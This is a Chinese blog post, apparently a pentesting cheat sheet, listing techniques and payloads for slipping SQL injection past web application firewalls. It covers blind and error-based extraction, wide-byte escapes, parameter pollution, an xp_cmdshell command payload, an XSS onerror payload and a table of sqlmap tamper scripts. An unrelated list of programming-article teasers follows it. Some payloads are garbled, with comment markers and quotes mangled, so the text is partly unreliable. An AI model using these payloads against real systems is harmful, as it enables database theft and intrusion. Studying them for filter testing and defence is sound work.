sql注入绕过技巧

前言

今天斗胆来整理一下sql注入的各种绕过姿势，以后方便查阅。SQL注入的绕过技巧有很多，具体的绕过技巧需要看具体的环境，而且很多的绕过方法需要有一个实际的环境，最好是你在渗透测试的过程中遇到的环境，否则如果仅仅是自己凭空想，那显然是不靠谱的。

1.括号绕过空格

如果空格被过滤，括号没有被过滤，可以用括号绕过。

在MySQL中，括号是用来包围子查询的。因此，任何可以计算出结果的语句，都可以用括号包围起来。而括号的两端，可以没有多余的空格。

例如：

select(user())from dual where(1=1)and(2=2)

这种过滤方法常常用于time based盲注,例如：

?id=1%27and(sleep(ascii(mid(database()from(1)for(1)))=109))%23

（from for属于逗号绕过下面会有）

上面的方法既没有逗号也没有空格。猜解database（）第一个字符ascii码是否为109，若是则加载延时。

2.引号绕过（使用十六进制）

会使用到引号的地方一般是在最后的where子句中。如下面的一条sql语句，这条语句就是一个简单的用来查选得到users表中所有字段的一条语句：

select column_name  from information_schema.tables where table_name="users"

这个时候如果引号被过滤了，那么上面的where子句就无法使用了。那么遇到这样的问题就要使用十六进制来处理这个问题了。
　　users的十六进制的字符串是7573657273。那么最后的sql语句就变为了：

select column_name  from information_schema.tables where table_name=0x7573657273

3.逗号绕过（使用from或者offset）

在使用盲注的时候，需要使用到substr(),mid(),limit。这些子句方法都需要使用到逗号。对于substr()和mid()这两个方法可以使用from to的方式来解决：

select substr(database() from 1 for 1);
select mid(database() from 1 for 1);

使用join：

union select 1,2 #等价于
union select * from (select 1)a join (select 2)b

使用like：

select ascii(mid(user(),1,1))=80   #等价于
select user() like 'r%'

对于limit可以使用offset来绕过：

select * from news limit 0,1
# 等价于下面这条SQL语句
select * from news limit 1 offset 0

4.比较符号（<>）绕过（过滤了<>：sqlmap盲注经常使用<>，使用between的脚本）

使用greatest()、least（）：（前者返回最大值，后者返回最小值）

同样是在使用盲注的时候，在使用二分查找的时候需要使用到比较操作符来进行查找。如果无法使用比较操作符，那么就需要使用到greatest来进行绕过了。
　　最常见的一个盲注的sql语句：

select * from users where id=1 and ascii(substr(database(),0,1))>64

此时如果比较操作符被过滤，上面的盲注语句则无法使用,那么就可以使用greatest来代替比较操作符了。greatest(n1,n2,n3,…)函数返回输入参数(n1,n2,n3,…)的最大值。
　　那么上面的这条sql语句可以使用greatest变为如下的子句:

select * from users where id=1 and greatest(ascii(substr(database(),0,1)),64)=64

使用between and：

between a and b：between 1 and 1; 等价于 =1

5.or and xor not绕过

and=&&  or=||   xor=|   not=!

6.绕过注释符号（#，–(后面跟一个空格））过滤

id=1' union select 1,2,3||'1

最后的or '1闭合查询语句的最后的单引号，或者：

id=1' union select 1,2,'3

7.注释符

//
--%20
/**/
#
--+
-- -
%00
;

普通注释

z.com/index.php?page_id=-15 %55nION/**/%53ElecT 1,2,3,4'union%a0select pass from users#

/**/在构造的查询语句中插入注释规避对空格的依赖或关键字识别#、–+用于终结语句的查询

内联注释

相比普通注释内联注释用的更多/!content/只有MySQL会正常识别content的内容其他

index.php?page_id=-15 /!UNION/ /!SELECT/ 1,2,3?page_id=null%0A///!50000%
55nIOn//yoyu/all//%0A/!%53eLEct/%0A/nnaa/+1,2,3,4…

两个示例中前者使用内联注释后者还用到了普通注释。使用注释一个很有用的做法便是对关键字的拆分要做到这一点后面讨论的特殊符号也能实现当然前提是包括/、*在内的这些字符能正常使用

####8. 大小写绕过 ####
大小写绕过用于只针对小写或大写的关键字匹配技术正则表达式/express/i 匹配时大小写不敏感便无法绕过，这是最简单的绕过技术

?id=1 UnIon SeLeCt user()#

####9. 双写绕过 ####
waf将关键字替换为空，没有递归

?id=1 uniunionon seselectlect user()#

10.编码绕过

利用urlencode，ascii(char)，hex，unicode等编码绕过

or 1=1即%6f%72%20%31%3d%31，而Test也可以为CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)。十六进制编码SELECT(extractvalue(0x3C613E61646D696E3C2F613E,0x2f61))双重编码绕过?id=1%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/1,2,password%252f%252a*/FROM%252f%252a*/Users--+一些unicode编码举例：
单引号：'
%u0027 %u02b9 %u02bc
%u02c8 %u2032
%uff07 %c0%27
%c0%a7 %e0%80%a7
空白：
%u0020 %uff00
%c0%20 %c0%a0 %e0%80%a0
左括号(:
%u0028 %uff08
%c0%28 %c0%a8
%e0%80%a8
右括号):
%u0029 %uff09
%c0%29 %c0%a9
%e0%80%a9

11.like绕过

?id=1' or 1 like 1#
可以绕过对 = > 等过滤

####12. in绕过 ####
or ‘1’ IN (‘1234’)#
可以替代=

13.等价函数或变量

hex()、bin() ==> ascii()sleep() ==>benchmark()concat_ws()==>group_concat()mid()、substr() ==> substring()@@user ==> user()@@datadir ==> datadir()举例：substring()和substr()无法使用时：?id=1 and ascii(lower(mid((select pwd from users limit 1,1),1,1)))=74　或者：
substr((select 'password'),1,1) = 0x70
strcmp(left('password',1), 0x69) = 1
strcmp(left('password',1), 0x70) = 0
strcmp(left('password',1), 0x71) = -1

####14. 生僻函数 ####
MySQL/PostgreSQL支持XML函数：Select UpdateXML(‘ ’,’/script/@x/’,’src=//evil.com’);

?id=1 and 1=(updatexml(1,concat(0x3a,(select user())),1))SELECT xmlelement(name img,xmlattributes(1as src,'a\l\x65rt(1)'as \117n\x65rror));　//postgresql?id=1 and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));and 1=(updatexml(1,concat(0x5c,(select user()),0x5c),1))and extractvalue(1, concat(0x5c, (select user()),0x5c))

15. 反引号绕过
反引号是个比较特别的字符,可利用在分隔符及注释作用，不过使用范围只于表名、数据库名、字段名、起别名这些场景

表名

payload：select * from `users` where user_id=1 limit 0,1;

可以正常执行的，这样使用还可以起到分隔符的作用，如下

eg：select * from`users`where user_id=1 limit 0,1;

起别名

payload：select user_id,user `111111` from users where user_id=1 limit 0,1;

反引号注释符原理

上面说了反引号的使用，下面来看看具体是怎么使用来进行绕过SQL检测的

主要用的就是起别名这个，这个运用范围比较窄

如果不闭合反引号，则后面的所有都会成为别名

eg：select 1,2 `111111 from users where user_id=1 limit 0,1;

相当于注释的作用的，不过运用条件比较苛刻

16 宽字节绕过
过滤 ’ 的时候往往利用的思路是将 ’ 转换为 ’ 。

在 mysql 中使用 GBK 编码的时候，会认为两个字符为一个汉字，一般有两种思路：

（1）%df 吃掉 \ 具体的方法是 urlencode(’) = %5c%27，我们在 %5c%27 前面添加 %df ，形成 %df%5c%27 ，而 mysql 在 GBK 编码方式的时候会将两个字节当做一个汉字，%df%5c 就是一个汉字，%27 作为一个单独的（’）符号在外面：

id=-1%df%27union select 1,user(),3--+

（2）将 ’ 中的 \ 过滤掉，例如可以构造 %**%5c%5c%27 ，后面的 %5c 会被前面的 %5c 注释掉。

一般产生宽字节注入的PHP函数：

1.replace（）：过滤 ’ \ ，将 ’ 转化为 ’ ，将 \ 转为 \，将 " 转为 " 。用思路一。

2.addslaches()：返回在预定义字符之前添加反斜杠（\）的字符串。预定义字符：’ , " , \ 。用思路一

（防御此漏洞，要将 mysql_query 设置为 binary 的方式）

3.mysql_real_escape_string()：转义下列字符：

\x00 \n \r \ ' " \x1a

（防御，将mysql设置为gbk即可）

*宽字节绕过只有php版本小于5.4的时候才可以

17.\N绕过

\N相当于NULL字符

select * from users where id=8E0union select 1,2,3,4,5,6,7,8,9,0
select * from users where id=8.0union select 1,2,3,4,5,6,7,8,9,0
select * from users where id=\Nunion select 1,2,3,4,5,6,7,8,9,0

18.特殊的绕过函数

18.1用greatest()绕过<>

mysql> select greatest(ascii(mid(user(),1,1)),150)=150;+------------------------------------------+
| greatest(ascii(mid(user(),1,1)),150)=150 |+------------------------------------------+
|1 |+------------------------------------------+

18.2使用mid()等逗号被过滤的情况

mid(user() from 1 for 1)substr(user() from 1 for 1)mysql> select ascii(substr(user() from 1 for 1)) < 150;+------------------------------------------+
| ascii(substr(user() from 1 for 1)) < 150 |+------------------------------------------+
|1 |+------------------------------------------+

####18.3. 内联注释绕过 ####
id=-1’/!UnIoN/ SeLeCT 1,2,concat(/!table_name/) FrOM /information_schema/.tables /!WHERE //!TaBlE_ScHeMa/ like database()#

18.4.or and xor not绕过

and=&&  or=||   xor=|   not=!

####18.5. PCRE绕过 ####
union/*’+'a’1000001+’/select

###19. php中常见的waf及绕过 ###
php过滤直接用preg_match(’/(’.waf.’)/i’,$id)

####19.1 过滤and or ####
waf = ‘and|or’
过滤代码 1 or 1=1 1 and 1=1
绕过方式 1 || 1=1 1 && 1=1
####19.2 过滤union ####
waf = ‘and|or|union’
过滤代码 union select user,password from users
绕过方式 1 && (select user from users where userid=1)=‘admin’
####19.3 过滤where ####
waf = ‘and|or|union|where’
过滤代码 1 && (select user from users where user_id = 1) = ‘admin’
绕过方式 1 && (select user from users limit 1) = ‘admin’
####19.4 过滤limit ####
waf = ‘and|or|union|where|limit’
过滤代码 1 && (select user from users limit 1) = ‘admin’
绕过方式 1 && (select user from users group by user_id having user_id = 1) = ‘admin’#user_id聚合中user_id为1的user为admin

19.5过滤group by

waf = 'and|or|union|where|limit|group by'
过滤代码 1 && (select user from users group by user_id having user_id = 1) = 'admin'
绕过方式 1 && (select substr(group_concat(user_id),1,1) user from users ) = 1

19.9过滤substr

waf = 'and|or|union|where|limit|group by|select|\'|hex|substr'
过滤代码 1 && substr(user,1,1) = lower(conv(11,10,16)) 
绕过方式 1 && lpad(user(),1,1) in 'r'

####20. 关键字拆分 ####
‘se’+‘lec’+‘t’
%S%E%L%E%C%T 1
1.aspx?id=1;EXEC(‘ma’+‘ster…x’+‘p_cm’+‘dsh’+‘ell “net user”’)
!和()’ or --+2=- -!!!'2
id=1+(UnI)(oN)+(SeL)(EcT)

####21. HTTP参数控制 ####
这里HTTP参数控制除了对查询语句的参数进行篡改还包括HTTP方法、HTTP头的控制

HPP(HTTP Parameter Polution)

举例

/?id=1;select+1&id=2,3+from+users+where+id=1—
/?id=1//union/&id=/select/&id=/pwd/&id=/from/&id=/users

HPP又称做重复参数污染最简单的就是?uid=1&uid=2&uid=3对于这种情况不同的Web服务器处理方式不同。具体WAF如何处理要看其设置的规则

HPF(HTTP Parameter Fragment)

这种方法是HTTP分割注入同CRLF略有相似之处(使用控制字符%0a、%0d等换行)

举例

/?a=1+union/&b=/select+1,pass/&c=/from+users--
select * from table where a=1 union/* and b=/select 1,pass/ limit */from users—

看完上面两个示例发现和HPP最后一个示例很像不同之处在于参数不一样这里是在不同的参数之间进行分割结果到了数据库执行查询时再合并语句。

HPC(HTTP Parameter Contamination)

这一概念见于Beyond SQLi: Obfuscate and Bypass这里Contamination意为污染
RFC2396定义了如下一些字符

Unreserved: a-z, A-Z, 0-9 and _ . ! ~ * ' ()
Reserved : ; / ? : @ & = + $ ,
Unwise : { } | \ ^ [ ] `

不同的Web服务器处理处理构造得特殊请求时有不同的逻辑

####22. 比较符(<,>)绕过 ####
同样是在使用盲注的时候，在使用二分查找的时候需要使用到比较操作符来进行查找。如果无法使用比较操作符，那么就需要使用到greatest来进行绕过了。
最常见的一个盲注的sql语句。

select * from users where id=1 and ascii(substr(database(),0,1))>64

此时如果比较操作符被过滤，上面的盲注语句则无法使用,那么就可以使用greatest来代替比较操作符了。greatest(n1,n2,n3,等)函数返回输入参数(n1,n2,n3,等)的最大值。
那么上面的这条sql语句可以使用greatest变为如下的子句:

select * from users where id=1 and greatest(ascii(substr(database(),0,1)),64)=64

总结：使用greatest()绕过比较操作符

####23. 万能密钥绕过 ####
用经典的or 1=1判断绕过,如or ‘swords’ =’swords

sqlmap/tamper是官方给出的一些绕过脚本

序号	脚本名称	注释
1	0x2char	将每个编码后的字符转换为等价表达
2	apostrophemask	单引号替换为Utf8字符
3	apostrophenullencode	替换双引号为%00%27
4	appendnullbyte	有效代码后添加%00
5	base64encode	使用base64编码
6	between	比较符替换为between
7	bluecoat	空格替换为随机空白字符，等号替换为like
8	chardoubleencode	双url编码
9	charencode	将url编码
10	charunicodeencode	使用unicode编码
11	charunicodeescape	以指定的payload反向编码未编码的字符
12	commalesslimit	改变limit语句的写法
13	commalessmid	改变mid语句的写法
14	commentbeforeparentheses	在括号前加内联注释
15	concat2concatws	替换CONCAT为CONCAT_WS
16	equaltolike	等号替换为like
17	escapequotes	双引号替换为\\\\
18	greatest	大于号替换为greatest
19	halfversionedmorekeywords	在每个关键字前加注释
20	htmlencode	html编码所有非字母和数字的字符
21	ifnull2casewhenisnull	改变ifnull语句的写法
22	ifnull2ifisnull	替换ifnull为if(isnull(A))
23	informationschemacomment	标示符后添加注释
24	least	替换大于号为least
25	lowercase	全部替换为小写值
26	modsecurityversioned	空格替换为查询版本的注释
27	modsecurityzeroversioned	添加完整的查询版本的注释
28	multiplespaces	添加多个空格
29	nonrecursivereplacement	替换预定义的关键字
30	overlongutf8	将所有字符转义为utf8
31	overlongutf8more	以指定的payload转换所有字符
32	percentage	每个字符前添加%
33	plus2concat	将加号替换为concat函数
34	plus2fnconcat	将加号替换为ODBC函数{fn CONCAT()}
35	randomcase	字符大小写随机替换
36	randomcomments	/**/分割关键字
37	securesphere	添加某字符串
38	sp_password	追加sp_password字符串
39	space2comment	空格替换为/**/
40	space2dash	空格替换为–加随机字符
41	space2hash	空格替换为#加随机字符
42	space2morecomment	空格替换为/**_**/
43	space2morehash	空格替换为#加随机字符及换行符
44	space2mssqlblank	空格替换为其他空符号
45	space2mssqlhash	空格替换为%23%0A
46	space2mysqlblank	空格替换为其他空白符号
47	space2mysqldash	空格替换为–%0A
48	space2plus	空格替换为加号
49	space2randomblank	空格替换为备选字符集中的随机字符
50	symboliclogical	AND和OR替换为&&和||
51	unionalltounion	union all select替换为union select
52	unmagicquotes	宽字符绕过GPC
53	uppercase	全部替换为大写值
54	varnish	添加HTTP头
55	versionedkeywords	用注释封装每个非函数的关键字
56	versionedmorekeywords	使用注释绕过
57	xforwardedfor	添加伪造的HTTP头

未完，待续！

查看全文
如若内容造成侵权/违法违规/事实不符，请联系编程学习网邮箱：809451989@qq.com进行投诉反馈，一经查实，立即删除！

JavaScript的预解析
JavaScriptJavaScriptJavaScript的预解析对于JSJSJS代码，JSJSJS解释器会先进行预解析，然后再执行代码。 1.预解析会将所有varvarvar变量声明提升到作用域的最前面，（没有赋值操作) 2.预解析会将所有varvarvar函数声明提升到作用…...
2024/5/3 0:49:26
tsp遗传算法
#include<stdio.h> #include<stdlib.h> #include<string.h> #include<time.h> #include<math.h> #include<iostream> using namespace std; #define M 10 // 种群规模 #define N 31 // 省会、首府城市数量 #define T 10000 // 遗传代数 #…...
2024/4/25 17:25:28
使用Flask写接口并部署到服务器上运行
项目三大架构逻辑架构（业务架构）–》思维导图（整理用户故事）技术架构（前端后端数据库缓存消息队列搜索引擎…） 开发语言：python 框架：Django、物理架构（如何部署项…...
2024/5/2 12:12:02
图书管理系统（6）
添加功能： DAL public static int add(Member mer){var sql $"insert into Member values({mer.M_name},{mer.M_tel},{mer.M_sex},{mer.M_address},{mer.M_tstart},{mer.M_tend})";int adap DB.zsg(sql);return adap;} 后台： protected vo…...
2024/5/4 3:36:13
VirtualBox linux虚拟机如何实现“桥接”上网
虚拟机的所有操作都不会影响真实机，即使虚拟机崩溃或者中病毒，所以我们做的一些危险操作都可以在虚拟机中进行，那么如何让虚拟机能够访问网络了，今天就以centos系统为例，告诉大家如何通过最简单的方法访问网络&#xf…...
2024/4/30 5:04:28
异步-CompletableFuture
1.0 线程回顾 1.1 初始化线程的4中方式继承Thread实现Runnable接口实现Callable 接口FutureTask (可以拿到返回结果,可以处理异常)线程池通过线程池性能稳定，也可以获取执行结果，并捕获异常。但是，在业务复杂情况下，一个异步调…...
2024/5/2 12:02:30
LeetCode_925_长按键入
题目链接 https://leetcode-cn.com/problems/long-pressed-name/ 解题思路显然，字符串typed中的每个字符，只有两种可能作为name的一部分，此时会匹配name中的一个字符作为长按键入的一部分。此时它应与前一个字符相同如果typed中存在一个…...
2024/4/13 21:29:32
B. Multiply by 2, divide by 6（水题）Codeforces Round #653 (Div. 3)
原题链接： https://codeforces.com/problemset/problem/1374/B 测试样例 Input 7 1 2 3 12 12345 15116544 387420489 Output 0 -1 2 -1 -1 12 36 Note 解释 15116544 这个样例 : 除以 6 得到 2519424;除以 6 得到 419904;除以 6 得到 69984;除以 6 得到 11664;乘以…...
2024/4/27 18:25:56
Java实习生面试基础（一）
做为一个Java应届生来说，Java基础是至关重要的也是绝对会问道的问题。如果连这些基础都掌握你好的话，那我们面试通过的几率就微乎其微了。下面就让我们一起来复习一下Java基础吧！ 1、Java到底是什么东西？ Java是一款面向对象的编…...
2024/4/29 5:25:22
Go语言实现UDP服务端和客户端
Go语言实现UDP服务端和客户端UDP协议UDP服务端UDP客户端测试UDP服务端和客户端本文转载自 Go语言实现UDP通信UDP协议 UDP协议（User Datagram Protocol）中文名称是用户数据报协议，是OSI（Open System Interconnection，开…...
2024/4/30 20:43:03
Go语言实现UDP通信
Go语言实现UDP通信UDP协议UDP服务端UDP客户端测试UDP服务端和客户端本文转载自 Go语言实现UDP通信UDP协议 UDP协议（User Datagram Protocol）中文名称是用户数据报协议，是OSI（Open System Interconnection，开放式系统互…...
2024/4/21 16:18:12
C语言理论
一，数组与指针问题数组名是一个指向数组首元素的指针常量，一经定义，不可更改，其内容是数组的地址即数组首元素地址，其地址是自身在内存中的地址；指针是指针变量，定义之后仍可更改，…...
2024/4/12 20:55:26
springboot和mybatis整合
项目结构 pom.xml <dependency><groupId>org.springframework.boot</groupId><artifactId>spring-boot-starter-web</artifactId></dependency><dependency><groupId>org.springframework.boot</groupId><artifactI…...
2024/4/16 13:34:58
PHP中计算某时间周六日的方法
需求统计报表中的每周第一天，其实是从周日0点0分0秒到下一次周六的23:59:59。示例比如现在时间是2020/10/21，需要计算本周六的日期。代码如下： $now time(); $start date(Y/m/d 00:00:00,strtotime("Saturday -{$i} week"…...
2024/4/25 0:42:08
github突然访问不了怎么办？
最近几天出了毛病了，github一直访问不上，找了很多帖子，最终找到一个靠谱的： https://jingyan.baidu.com/article/11c17a2cfb88d6f446e39d82.html 主要是要从如下两个网址找到对应的IP http://github.com.ipaddress.com/ http:/…...
2024/5/2 1:51:37
恢复误删除的数据库数据-Oracle
Oracle数据误删快速恢复文章目录1、创建测试数据2、数据未提交【rollback回滚】3、数据已提交3.1、通过scn恢复数据3.2、通过时间恢复数据1、创建测试数据 --第一步创建测试表create table cctest1(id int,name varchar2(100),password varchar2(100)); --第二步插入数据inse…...
2024/5/1 4:36:09
【Leetcode每日一题】925. 长按键入（字符串比较）
Leetcode每日一题题目链接： 925. 长按键入解题思路： 使用两个指针name_index 和 typed_index 分别对两个字符串进行遍历，分为以下三种情况： - 当前两个字符相同并且下一个字符也相同时，同时向后移动一个字符 - 当前…...
2024/5/2 13:27:32
pyqt5 给按钮设置图标和css样式
设置图标 self.pushButton.setIcon(QIcon("sure.png")) 设置css样式 self.pushButton.setStyleSheet("QPushButton{color:black}" "QPushButton:hover{color:red}" "QPushButton{background-color:lightgreen}" "QPushButton{b…...
2024/4/24 16:45:02
spring和mybatis做查询表数据
spring与mybatis的整合简单使用java项目进行整合 1.导入spring和mybatis所需要的jar包和依赖包 2.创建用户实体类User package com.liu.www.entity;import java.util.Date;public class User {private int id;private String name;private Date birthday;private double sa…...
2024/4/16 1:44:58
【LeetCode】二叉树的中序遍历 (DFS的递归与非递归)
【LeetCode】二叉树的中序遍历 (DFS的递归与非递归) 给定一个二叉树，返回它的中序遍历。示例： DFS的递归调用： dfs的递归调用需要注意递归函数中必要的形参以及递归的条件或终止条件！ List<Integer> l new LinkedList&l…...
2024/4/6 6:24:57